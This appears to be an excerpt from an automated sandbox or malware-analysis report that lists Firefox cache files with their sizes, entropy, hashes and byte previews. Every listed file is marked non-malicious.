                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometTextWithEntitiesRelay_entity.graphql",[],(function(a,b,c,d,e,f){"use strict";a=function(){var a={alias:null,args:null,concreteType:"WorkForeignEntityInfo",kind:"LinkedField",name:"work_foreign_entity_info",plural:!1,selections:[{alias:null,args:null,kind:"ScalarField",name:"type",storageKey:null}],storageKey:null},b={kind:"Variable",name:"scale",variableName:"scale"},c={alias:null,args:null,kind:"ScalarField",name:"height",storageKey:null},d={alias:null,args:null,kind:"ScalarField",name:"uri",storageKey:null},e={alias:null,args:null,kind:"ScalarField",name:"width",storageKey:null},f={alias:null,args:null,kind:"ScalarField",name:"name",storageKey:null};return{argumentDefinitions:[{kind:"RootArgument",name:"scale"}],kind:"Fragment",metadata:{mask:!1},name:"CometTextWithEntitiesRelay_entity",selections:[{alias:null,args:null,kind:"ScalarField",name:"__typename",storageKey:null},{alias:null,args:[{kind:"Literal",name:"site",value:"comet"}],kind:"ScalarField",na

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\6806AE4F4B78BC9FCE7A4EEDF5C152008F4791C1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17862
                                                                                                                                                                                  Entropy (8bit):6.52536657734414
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:7V7QlXWn7VqN4mApqN3Xo70tNo+pwPm082nyFz/aio:Z8lXWcApQHkKo+pwPo2B
                                                                                                                                                                                  MD5:FB4027F18C0B23E77F2E37BF52D5643E
                                                                                                                                                                                  SHA1:F01D9C66591C6AE09B87EF9F1B565434FFB883B9
                                                                                                                                                                                  SHA-256:DBA7E5487340301ED9C38D56AECE4CFD81FBC2BF685029B6D2F73DBEB93EA1FE
                                                                                                                                                                                  SHA-512:1A333007599C204F5AF702AAEB64E0BC8D63569EC62C6477038ADACE01801CB7768FADD12F680CCCCCCAF8119F4D5B0DA6CD2AC6FE4376E49789AA85E1BAD73D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.P.. .-.?...vT.X.!.Az..t...x.ZB.c...W!.\{.:`..I.*y/;.Ba.s.........)`.*..c.....K.".<..W..<.m.{y3{l....6.Y_....o....S.y.7.q'?U......................~..[|..|[.....~..=..V........:..../)w.....oxv.e.t$..T..1v{..........s..DM...FZ5...js....|.9..fW..R.T.s.e..V.....0._h.n..u..eq.s?.|.v....9....$...%.......]..d......D.n....L...`Hs=....y.......R.Q?...2...T..~...A_...m.`... J.......u..y..P.D,KA....5C.4.c............@.......%.4:I.oL.{.6/..-}.....b.V.o.!..v.zS........S.2..bFY.K&F...A!.U"`.(!.D.o....h4...qN...y...H..e..`.....4...<T.O.X.4..s~.1..'S....."h.`....B.\..)^..]3cN|........=...FR....q..b......\..!...q.|.9.q.m.U.l%.b..M.....]......$.j...@Xk.O...^+.G...3.r`...aGf..~[!.p8Y2./.!kZ....+.G.A.......0.....'....._.s..8."D.~.......jIL....T....S.x..5.8.*...}{... ..9?.P9.U ...yw....".......O.@....r.m.[4*y..%...GHl...+j...=.S.`.....U..._.C.....4...Y.R]...S..t..h..i.fW.s..w....'....7.....i.I^.0...W.|m.`....>....MM...w.T.q.!.;.N.........E..<....j{A.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\68B85D2648F4A19BC454C9ACE28372B7AEC05DCE

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):19837
                                                                                                                                                                                  Entropy (8bit):6.805402059636057
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:zyAna1ISp7VqN4mApqN3Xo70tNo+pwPm082nyFz/atH:mAJApQHkKo+pwPo2R
                                                                                                                                                                                  MD5:92E25553F3149AFCEB941866173D4191
                                                                                                                                                                                  SHA1:3FDE9527F991C81C2F9011347C3282110238FC2E
                                                                                                                                                                                  SHA-256:9E2B756A6B19CB7C7AD05D6C7C058972FC64D9BFD5AF1BA48E07F21F214FF902
                                                                                                                                                                                  SHA-512:3C3086A8BFE49451871C4D8CD1B69619CA77B959D0D17CD7FE2677332BD135A573921CFCE7BCE0C9C7FE2AB1B4D37DC61B543313D3C1632E04FEF76E4E68DD2B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.`Z!...."d..._j....jG...`7.R_....=.....s.'..~S.E._J...{....d.....>...-A.!._.j..Q.H}...&+......=.V.1.-[l..t.tl...!....s..........9>.O.M.X.....B..b..HtG.HKs..R3=r..h..\(uf.8_e.......0......l.....m....".:W~J...9.......@5..8...h..J..>W+...../c.K.J7..2p5d.w(..(K.m).B...oe.....h.I..r.Hl.D...VD....c.R....MU.ZB......#.._..\..-z=..H...:.#u...ar.y@53..&.`z.g...k..c..J.....l.k.f_..*....z.'.%.:d.......`.2_5..g....\.0.3e"..|3...B.j..G[6..982J.7.<*._3+[....Ck..suJ...m....._.3;...ab.;..,.......T.4.i..~.X....K}L.e.......8..[......8v.(.Q.4L..83V..4....X....k......M...Ui.*...d.v..j.~.n_?}.Z.....?.....%X..;..Q..j....W.IZ.:.t..*c.[.(z..Or.~.R..F..wM#.....y..vU....4.N......k."n!Q..1B.....0f&.y.0...OHU,...&..\...&h..2f.......l.. K....>........g..p........v.q..;.2.5.24..a.b..V7..[..{1.$.@.....V....}.j.c+.wh.R.x.h..OU..OaL.S....8@zp&A.\..7...\E...)c..e..;....'....R;.+..:.jQ...m...t2.0D{........s.r{.b0.B.e..Ri?.cG...1.......o....TN..'?."Kr^d..iEd..c.....l9u...#L@....,F.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\69455E9F6ABEDFC78866EDEA94CB9D51C573A013

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):107
                                                                                                                                                                                  Entropy (8bit):4.562912914800682
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:xShOwllZRtl3BMqEcldnX+OGTAMrRzcSLUxGTKllllln:xShNlTPRiclp+OGb9LUxGmln
                                                                                                                                                                                  MD5:6FE364DD69D62B8B9ACE2307B8CD9E6E
                                                                                                                                                                                  SHA1:ED144759CA05CFC4A7D399C26534E489567348F8
                                                                                                                                                                                  SHA-256:9CE7B41B07C7ACC5964248C8CD61CD6C21AC0E7DA4A26801C2E15B577F638115
                                                                                                                                                                                  SHA-512:477E04168DCE2C75DA1059831AA06CFCC1CE29EA1DEAB0DF6EF517CD076E8DF9467AD980861B053DB60270D6B2EB6A9EF616EFBA99F4B1437D78661053A3D396
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:z{..........e..................B....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\6A2780E08FD0348BB3971DC643C1230A411518FE

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21334
                                                                                                                                                                                  Entropy (8bit):6.984269946797896
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:0bh+WVteP4/Klw97VqN4mApqN3Xo70tNo+pwPm082nyFz/a9l:qhBKlPApQHkKo+pwPo2z
                                                                                                                                                                                  MD5:9E78D58D57603E58413308A59FBEBE58
                                                                                                                                                                                  SHA1:5BD0A5BAD7881CAAF03FE5CD2EF15ABB25425E37
                                                                                                                                                                                  SHA-256:B26B3BA716829625856A54BF34CFB24E790726458947ED52D321654249817A8A
                                                                                                                                                                                  SHA-512:E774E35F263AEB242E0308B6AC77D02F51CDD0FD440CD633E2802E77D2891A4451E8DBB597BF5C6584AAC32EE3B72B3F0EA04FD65BEDCE91A0C5A5E8D8E1A5B5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.p.. ..R......L...Zm).....*.q.;...a.uz.".. ../...08..k7...ZW.;....v.t.=...$.Q.A..D.........?..~..W.e..k~H^.f*.>`.D...?.....,y..#"A..3...=1..c.ju.q!.....)e&I.)../.i*..FV....d.mC.;...~.."r...*..O[.WH.i.P.A..]G{...q$.2...Z>.4e&G...z..&.....D...M..L..wE...xsI25}&...#...+......\......N.3>.bg.MWAX....D..z.Xv..}......;.y.<B...:5......h..2...;`.G...u.o5!Q[.b..kw..K..3...3b..,..?FD..|>.R..7...(...p.M....}n...ZXI.@.j.!~!....9.....i..v...f..t..........S.....0.....4.')/.U}....=....1........a....=..'..0...yY.a.R..].BI.t...R.{./..4D7,.'.{_.......b?z.n.O.k..K.......T<.J....?u...a.f..BU....A...1E.!"..R.AF..M3...*....5m..%.[..;;.....b..........c.<iq....E.;p..Lf.\.5...q...6.^F9"....#F.dI...4...tJ......-.4i. .(9~........PC.B.l...dL^.....0^J_.^.....s.2.l...$..>..\.$e!.9..O.........V..t.[.~:..J~...L..]B0.......K..n..5.}.f6.&...G.u+.|f..2.u..t7.Os..E._......a~.|3T..]..n.~.V-fo..-....8N*......K...3.{..{..n<5C..QEt.....UC...fQ...g.b.J..1..<L.3...'~Z5RW._...

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\6BF8F5DE9A73DE7ABF990151AD474593B7D23DDE

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2233860352
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):85220
                                                                                                                                                                                  Entropy (8bit):7.969208031664875
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:qTqHi79vuDzc9nakAGSUZq3ieMiZbb7O26zIjrNMkq51ej+WYHmMA3GrGkWOK:di79vununakGUZALZbb7LBMkq516QHc5
                                                                                                                                                                                  MD5:2B372FA8804989BE0705E0D59EF975A9
                                                                                                                                                                                  SHA1:7179AB7285F7C14D681897C8C5274FE00FBB8357
                                                                                                                                                                                  SHA-256:6655368C4A83CCFBAC70857C98391B3EC4BA62F4DBA4DCEA09BE8857E3DCF99D
                                                                                                                                                                                  SHA-512:725214E0B223F71D90CE748D2987ABF2EC8D8D070CE978D85DE84FF470C0FE2A7B2F49FF56519A9E80F16BC39C5F5759E943685D178ADCB62B55B222D028A41A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........Zkw...._.^...PC...8.4...6.NgN.o^I...`jL.L....l.W0...Ua..h...c...E.."6.x.,Z....4.:."\...E0.....x....._..h9.q...+....j....o...(..?.j]=....x*.W.,..6...^.....N0..Q...n..Qm<.9.~..~..UN]..O?=.l.Hz..~0........8....7.k.;..sp$..9.;.......Xt.....8......kC.}.x...y8....$.}....4\,#Y{...Ew..e<..E.Q....?v_.B..r../gq0.d......N.y..X..'ss....W{..Xw....O.....}._.=....9...}nKn..4.......6....h........=./..'!..S<^..B...Ox.A{K..~Q..}....?...u......z..;`.g../..g.7...o_......M.fh!.;..*.H.g.L..._.gi...'..h..~A.....#..hL@.h#.9..-B..h7hwhghO..=G{....g..#.5.o..].}@c.Nz..x.1...Dll..c2.G>....}..S..W-.J...x..j..........I.b.h....,....."&..Az|.j.2....Z.....e.....x...5.l.".....#}72gf-?X..l4...p...Q...D=..^...T.....'.m6..K~>>.Cp.....D...tj.V.x.......`d>..0........!bBZ[.k!.*..T..O.6..&...P...'..K.\....w..=.c.{..~.A...$...=n.p.)..b.Vi.Pc"...P.<,/...h}.X(..N..>.=...i.V.n...]....d-...F.......?.C[.L...M..j.Y..&.:..O..U.!&,:.M.6.UB<.h-).`....y.;:..Q.iA.#Z.,.G.FC{..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\6D264199C0FFF3E48A90A48416AFDAA75380F257

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9262
                                                                                                                                                                                  Entropy (8bit):6.117824387267069
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:XIYEBR3lieyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdo+Zodo+Zi:XQ3YeLYGBRohB1r1uk/KiFTaIdaoFol
                                                                                                                                                                                  MD5:6C1D6C4EF6C69ADE619BB2E49A5861CD
                                                                                                                                                                                  SHA1:1BE693A32E431E052C2F018653E1D9357C9E3E59
                                                                                                                                                                                  SHA-256:63AEC625B6CA58A8392EA770F8B49831EC6D49BB1DCBC52CB909BE23A95CA8FF
                                                                                                                                                                                  SHA-512:B97C76B17F5EBD282CDA36794873BB70058BE27D3366698E50D2691AA233FE63DA35E03014D5AE619FBB35E0B63B2B4A6DBB36CBBC520A6B3A273266F655CC42
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"schema":{"type":"object","required":["firstPartyOrigin","thirdPartyOrigin"],"properties":{"firstPartyOrigin":{"type":"string","title":"firstPartyOrigin","description":"the first-party origin being used for the permission."},"thirdPartyOrigin":{"type":"string","title":"thirdPartyOrigin","description":"the third-party origin being used for the permission."}},"description":"an exempt list that partitioning will be automatically relaxed for specific origins."},"signature":{"ref":"u0mgbpz5iwxi38fzobs7wao8m","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"qWLsCicKFbULmR_a-Knb_SsvfJ06rOcoFmRaaBKNiTENkQNnv_scoZOsW10YOfmYJut1r9Ju3gnTWzm4KpP3OxjiZor6OhUAGFi3p7FMOMncHxXNs0KF1suo4YNOQZ6W","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7g

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 4228120576
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8888
                                                                                                                                                                                  Entropy (8bit):6.666361069981275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:8h9cQuDxLilu+rJn6yTTmWgv+ilu+rJn6yTTmWgvfNbZovzcdXY1Mld4Y1MZ:8hWDYXrHTgvFXrHTgvfAQXVH4VZ
                                                                                                                                                                                  MD5:F8F620F8EBEF1ED0FB26BC46683A07C6
                                                                                                                                                                                  SHA1:5685D2B28AEDFA97EEE867E6C17824A986A6407F
                                                                                                                                                                                  SHA-256:AE9CBA019164C6167BDF2B3B600AFDBB1FC5E42E8E0D18666C146D5BB2004C0A
                                                                                                                                                                                  SHA-512:3A7AD1263EE0E509AB2A6FB66C562F2C0EA55E5A65FA1E6346891F0BA916FCEFBE89750E8C44B9957371A45B355BB3880F8AC5A0088BF0E5277DAC084C7BA229
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........k..H...........t..x..Am.....(....BQ'.....3..M.....u.[....Z......R....s....n.k..V.i..c.....<..e..K..mr.T..G.O.|..=i.L=..c./I...V....\..E_..,HP`.....|F.d({.....s..Q 2B=.\?....>.C.Y~...C.........A..{TdO...p.>B.0..o...../....#1...:...@I...e:\........].w..6..... 8?....l.a...nn..v.HW.....T0x.k...g...$N.6.rmk.dY. .Vo.Hx...2LU?.1...N.....K.H..!z...M...t;R......ml~.K.....^.....K4..hr3.'...ttU...;aO.jy..U.<:."R%{........X:.S%.>q]4...g~...,N...h..n..l.I>.9..uY.*..{......=q/.`Lkd.'.-.h...<.y.H'...c..4.KK.........Me...CU.Z..T.!J..s=.o.V..5.U.....[.S.....&.qo.L...G..&8E#../..p.7..6......w.,.O(...z..sk.|^*.9......'E.....ey.d.":..f...2.......N..,...)...+.).......bj.?hu?7.ND`27.=.p\...k....`..w.....F.#...ElQe.9...X....X~..^f.oX(....{..|.].$."7.8].&u.......'...&`....e~V..F.....i(C....Q.(...xt!.eI...a.."d.`.A........... zp .@.C.. ..............#...{.....7...F.)^....9.tcm....;.9...."c....d.w.d....ND=$.w?.\.6.7o@.......F.M.9...cG...F.B....SM......

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\6E37D21D51473D3251F36115B04A004DCEADB63B

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 90243840
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):232192
                                                                                                                                                                                  Entropy (8bit):7.99431129071616
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:6144:ASGZXsycPyioLDvOFQOa5Mdc2mlCuli7PaXik:7o8XPUv2Gxi4nwPaXik
                                                                                                                                                                                  MD5:0DBBA6E0E2216B002FC0D7F525E1C98C
                                                                                                                                                                                  SHA1:ECBBFEC691BFE15BE64F468E1CF78651091F3C3D
                                                                                                                                                                                  SHA-256:EF6AD5CB5021BB29404255CC4E1B6B203E334F89F89E1CB5C8C3A3E01978D06C
                                                                                                                                                                                  SHA-512:51AF00487960AC3E091A58F404FF84DB9646AC1ECB6B3CA7CDEB85AB5C905EA8D5F9C35D2B9797D2831231DB1DDE844CEE6EBD3CBF164238C73B6830F9DC06BA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........<iw....W...............I....h.($l...%[....6(6..$}f.y..HT.{....z.e..$.=;..gS/HR..{I"w.[.....t..uw.... .....2.h.. .R/.....8\....D...y..c..Fw.O..:.21......8.c#.. E..xI..+..|/@]...s.....x.....5}\!o6O...../.<'....0.e......(v.pe.=.A.......0.....u..7.......9....c.E(.a....8hmh[.h...:..0|.B....E.-..<.>.M......$....^Z....bY..US5..=..[.....;.....w0.h-../...,(k*..z.E.c.h-......:.....t...Pq&..d...y}..[.e.4Jd.O....cf....o..]..Rd[..O.KKe..,..sl.......x)r6........v...[.....U..7l..n..zi.....%.??.G...}...._..L.....fZa...C3}.....6.1..-.`.N.H.8jk*ldt.n.>.../..,..N..t..0.v.G#....`...P..+4.`.vF.$..........Q..>.5fZ...R.#h{...-.&H.jay>.....S......]!.......yCA.$...T..2..f.p.E.(H........E.\Y....Q....Cr.{"-.*.7..g.'.I`p..@..s...h.i._.w.@......v...r..=..?[.^...&|><.s.*K.rZ.K..p...tB.;.(He.m.I...9Jp.. ...*..X.C.....i.p..3...V.*.....DA...?F.....3...aO.i}U.(i..........q. .)..w..n.y...g1.U.?..5]....\..S..|..0.C)Z!y!.a_..A/....%.3....I...um..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\6EE649DE249670B9289DE7443484BD278D3CCEA2

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.040850304368062
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:VKMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckALUcuALc:TWebV2GZuZrFK0k0t7qW0NbZovEplH
                                                                                                                                                                                  MD5:3294EB9CC29E9125CBD5B32B2EA1344D
                                                                                                                                                                                  SHA1:EC101D78A3D7379265FDADA387349139E16DEA6F
                                                                                                                                                                                  SHA-256:CFAA6B433AEFAB1F9EC4BA3AC215699778E37315CA942983202622E5CE016F6D
                                                                                                                                                                                  SHA-512:DF948FD91BE995C59F7C2F625C3C8FF3BD948FC89E4E437E79ECC4110E295C0970FA2BCE6F193ACEA1B4A0EE361805FEA0C46581DED6CEA17E932C4FC159FC4E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:T.9.........e...e...F.A.e...........a,~1708514994,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/b38522d7-1787-4855-a312-c27916e30610.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeB

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\7284D77BFD60E1A199A642C4084610F248FD52B6

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 268632064
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11650
                                                                                                                                                                                  Entropy (8bit):6.418010992174564
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:oxxlLx89q4ezOYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CvDXhj:o7lNuqFtmzwTWvoglJmzwTWvogrBHJmi
                                                                                                                                                                                  MD5:E8EE2C5B3CE17108026D3EC548A3825B
                                                                                                                                                                                  SHA1:8D8283E832E0377F81568FC403CB2FFF42A5F30A
                                                                                                                                                                                  SHA-256:E41C9F12A6DA345C87A633CC9BA46D40EACE1AF836E413F75DD7A556497D70FF
                                                                                                                                                                                  SHA-512:5A37DE7CA9D04D47711F12ABA2F856BEF09CF036C837CEF73122318F181EDFEEDD7D9B01B89B6D59F7535B18C0F9A45647632DC4B2103A3BB961EB3AADF914E7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........T.n.6..... ..j..6X`..UVoK.bS.4...IY.eJ..y..w/(.n....Kw....S..t...6.mQv.t...K)....,MZ..Z....&..H[......`W.U...xb...D..D...h<..J............".gM.l.......>.....)........i.MU....Y.$SL.}_.F.C{.y6H... .G......$D>..A.N.x.:.9I3....\#Ahn.eG.M.......UJ. .......q..5..J=...........e....E./.ul......m.-.Uo.}.k........;.......G..*9.....9..p.0..yv...Wx../...*..b.,AbU..1..HG.%. .q(. .........b<....@V.E.z./I.0.K.... ..o.+..shg..b_.Z.(Rd.4.~....L.9....}l..Sn..C>..+m.zl4A....tdN....a.c..8.H./6).I{Z.t.J....n;$..r._eJ.#....|c.S.`.m..-.-..f....i......h...@@...PCg.n...p....:.....w....:....z.'..[....|.4...9.p:.y.N...(.H.gM.Gz...G8.$m[.$.,....h...?.X.N^.8...5..?V.....se.CPH2..u.a1..X...H...D+.O...a.i...n.a......[.O..~..U....0..)......UO............e...e...F.B.g.C....T....O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\75D9B5906F35FB57ABADDCE016AA9F9BB9C5FF0C

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.0390561919846855
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:UMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEck2LUcu2LU3:DWebV2GZuZrFK0k0t7qW0NbZovEprV
                                                                                                                                                                                  MD5:C1297F47C11FAAA58A3A1F985E39C7D6
                                                                                                                                                                                  SHA1:93EFBE1F2142989940B277FBAFB5F8EC027C9F6E
                                                                                                                                                                                  SHA-256:2125ED7D8C8633663D2EB2806393942A0EC6704A3D778407EEB671C042C09727
                                                                                                                                                                                  SHA-512:72EAD77ABB66B95C164FB36A6D39E3887572AD9D1CD73681B158A6F78E8101D6553F78C7181C581D6EB4ADC30D83C7EF615A0A350613836899BC8B873C6BB295
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:q:./........e...e...F.A.e...........a,~1708515002,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/2143cd64-6046-46d9-bd1d-4fbd6e7367c1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeB

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\7943793AD6EF12CA229A1DF7A721B44C210BBC82

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32390
                                                                                                                                                                                  Entropy (8bit):5.588717540412683
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:iy/K4ALv/YPxl+VRFHiUzNfw4CNxieLYGBRohB1r1uk/KiFTaIdaDqDI:iknS0z4kUzNfyxie8GvIDuuKOa8s
                                                                                                                                                                                  MD5:6D71699BFE4B1FA8A134879FBDF7A65A
                                                                                                                                                                                  SHA1:195731ECE38A3E229E30B34D521CC17381D61498
                                                                                                                                                                                  SHA-256:150E6BF128E1F18E1E7271FD3CFADED6C1C29C50AE98318CBEBCB6110B23738B
                                                                                                                                                                                  SHA-512:A1C92E71976CA2F898B06B72CCB16C83505AB3EBC4855AA622A6339E422BE04F13FCB39312C6DCFC40B99643AF56DB8A5DDB95615BCEAA3B520E7E214CCBCA6C
                                                                                                                                                                                  Malicious:false
